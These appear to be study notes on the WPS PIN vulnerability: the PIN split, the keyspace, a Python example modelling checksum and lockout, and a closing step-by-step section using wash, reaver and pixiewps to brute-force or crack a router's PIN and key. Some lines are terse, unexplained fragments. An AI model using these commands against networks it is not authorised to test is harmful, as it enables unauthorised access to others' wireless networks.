WPS (WIRELESS PROTECTED SETUP)
- WPS is a technology developed by the Wi-Fi Alliance in 2006.
- It simplifies joining a wireless network by using a PIN code, so there is no need to remember the PSK.
- Push-button mode: a button is pressed on both the router and the network card to join the wireless network.
- The PIN code is divided into 2 segments of 4 digits each, for a total of 8 digits.
- Security vulnerability
- PSK: 218,340,105,854,896
- A security-related vulnerability was discovered in 2011
- The client initiating access can tell from the router's response whether the first 4 digits are correct.
- The last 4 digits of the PIN code have only 1,000 possible combinations (the last digit is a checksum).
- So an exhaustive search requires only 11,000 attempts (10,000 for the first half plus 1,000 for the second).
- The standard itself does not define a lockout mechanism. Multiple manufacturers have since implemented one.
- Wireless routers from many manufacturers, including Linksys, cannot turn off the WPS function.
- Even if WPS is turned off in the web interface, the setting does not take effect.
- The attack difficulty is relatively low, but defense is very difficult.
- Generally, the password can be cracked within 4-10 hours
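An added example (not part of the original notes) that works through the figures above: the checksum digit, the 10,000 + 1,000 split, and how a lockout policy changes the worst-case time. The checksum routine is the publicly documented WPS algorithm; the 3 s per attempt, 3-failure threshold and 60 s lock are assumed values, and the lockout model is a simplification.

```python
"""WPS PIN keyspace and the effect of a lockout policy (added example)."""


def wps_checksum(first7: int) -> int:
    """Checksum digit for the first 7 digits of a WPS PIN."""
    accum = 0
    while first7:
        accum += 3 * (first7 % 10)   # odd positions from the right weigh 3
        first7 //= 10
        accum += first7 % 10         # even positions weigh 1
        first7 //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if pin is 8 ASCII digits and the 8th digit matches the checksum."""
    if len(pin) != 8 or not (pin.isascii() and pin.isdigit()):
        return False
    return wps_checksum(int(pin[:7])) == int(pin[7])


def valid_second_halves(first_half: str) -> int:
    """Count 4-digit second halves that pass the checksum for one first half."""
    return sum(is_valid_pin(f"{first_half}{s:04d}") for s in range(10_000))


def keyspace() -> dict:
    """Guesses needed if the PIN is checked whole vs. half by half."""
    return {
        "whole": 10 ** 7,            # 7 free digits, checksum is determined
        "split": 10 ** 4 + 10 ** 3,  # each half confirmed separately
    }


def worst_case_hours(attempts, secs_per_attempt, max_fail=None, lock_secs=0):
    """Simplified model: the AP locks for lock_secs after every max_fail
    failed attempts; the final attempt is the successful one."""
    lockouts = (attempts - 1) // max_fail if max_fail else 0
    return (attempts * secs_per_attempt + lockouts * lock_secs) / 3600


if __name__ == "__main__":
    n = keyspace()["split"]
    print("valid second halves for one first half:", valid_second_halves("1234"))
    print("guesses, whole vs split:", keyspace())
    # Assumed values: 3 s per attempt, lock 60 s after every 3 failures.
    print("no lockout   : %.1f h" % worst_case_hours(n, 3))
    print("3 fails/60 s : %.1f h" % worst_case_hours(n, 3, 3, 60))
```

With the assumed 3 s per attempt the unlocked worst case falls inside the 4-10 hour range quoted above, while even a short lock after a few failures stretches it to days.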
- PSK
- Use a computer to directly calculate the PIN
- C83A35
- 00B00C
Actual process
- After starting monitor mode, find the AP
wash -i wlan0mon   # or
airodump-ng wlan0mon --wps
- Brute-force the PIN code
reaver -i wlan0mon -b <AP MAC> -vv
- Break the PIN code in 1 second
reaver -i wlan0mon -b <AP MAC> -vv -K 1
pixiewps
- Only works against chips from specific manufacturers, and the success rate is very low.
- After getting the PIN code, you can continue the crack
reaver -i wlan0mon -b <AP MAC> -vv -p <PIN code>
Problem: 1